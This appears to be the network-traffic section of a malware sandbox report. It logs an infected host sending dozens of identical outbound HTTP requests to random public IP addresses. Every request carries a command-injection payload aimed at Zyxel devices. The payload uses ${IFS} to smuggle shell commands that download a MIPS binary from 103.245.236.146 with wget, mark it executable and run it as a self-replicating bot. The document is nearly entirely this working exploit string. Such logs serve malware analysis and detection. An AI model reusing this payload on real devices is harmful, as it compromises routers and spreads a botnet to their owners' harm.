                                                        Jan 28, 2024 10:12:53.419594049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4509192.168.2.1443296137.200.114.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419626951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4510192.168.2.1444980145.54.209.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419682980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4511192.168.2.145888477.60.110.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419722080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4512192.168.2.1437822219.28.231.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419754982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4513192.168.2.14401521.252.209.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419797897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4514192.168.2.14343182.46.89.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419882059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4515192.168.2.1450654180.64.159.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419893980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4516192.168.2.143574278.138.231.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419928074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4517192.168.2.144305452.124.255.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419955969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4518192.168.2.143464239.125.65.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420006990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4519192.168.2.1440852167.174.97.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420030117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4520192.168.2.1439552194.126.104.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420069933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4521192.168.2.1451078146.134.100.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420120955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4522192.168.2.144212884.0.166.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420183897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4523192.168.2.1434474108.10.206.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420203924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4524192.168.2.1459860161.92.205.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420248985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4525192.168.2.145270642.239.116.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420301914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4526192.168.2.143453031.161.132.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420335054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4527192.168.2.1456822216.113.36.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420377016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4528192.168.2.1452620124.251.211.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420414925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4529192.168.2.1435118186.151.236.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420470953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4530192.168.2.143805064.188.127.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420499086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4531192.168.2.144897074.121.80.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420557976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4532192.168.2.144120484.245.93.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420602083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4533192.168.2.144275688.173.119.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420649052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4534192.168.2.1446178210.213.164.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420701027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4535192.168.2.1450276211.69.59.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420754910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4536192.168.2.143605817.220.77.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420773029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4537192.168.2.144587472.234.33.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420779943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4538192.168.2.1437482151.173.154.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420844078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4539192.168.2.143523478.227.98.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420866966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4540192.168.2.1433214200.127.162.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420902967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4541192.168.2.145389623.103.228.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420932055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4542192.168.2.14398204.162.146.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.420983076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4543192.168.2.144187443.54.55.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421003103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4544192.168.2.145259898.165.120.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421041965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4545192.168.2.1459766218.52.246.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421073914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4546192.168.2.1439952206.50.59.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421096087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4547192.168.2.1436426103.3.226.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421134949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4548192.168.2.143896090.61.57.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421189070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4549192.168.2.146078634.207.228.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421231985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4550192.168.2.1444956178.192.226.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421271086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4551192.168.2.145617250.104.174.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421314001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4552192.168.2.1460398103.67.135.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421341896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4553192.168.2.1459884210.16.97.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421387911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4554192.168.2.144231885.232.24.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421446085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4555192.168.2.1443334222.66.140.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421483040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4556192.168.2.144174838.167.91.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421540022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4557192.168.2.145954665.227.109.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421557903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4558192.168.2.144995839.75.181.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421600103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4559192.168.2.1454606198.5.27.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421658039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4560192.168.2.1443808174.51.214.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421701908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4561192.168.2.1436732100.41.69.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421746969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4562192.168.2.1439070156.144.22.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421785116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4563192.168.2.144791034.49.23.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421828032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4564192.168.2.145364898.221.165.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421842098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4565192.168.2.145896669.93.144.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421880007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4566192.168.2.145002449.140.185.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421943903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4567192.168.2.1446770121.232.209.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.421981096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4568192.168.2.145553058.19.231.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422044992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4569192.168.2.143333218.36.150.31443
                                                        TimestampBytes transferredDirectionData
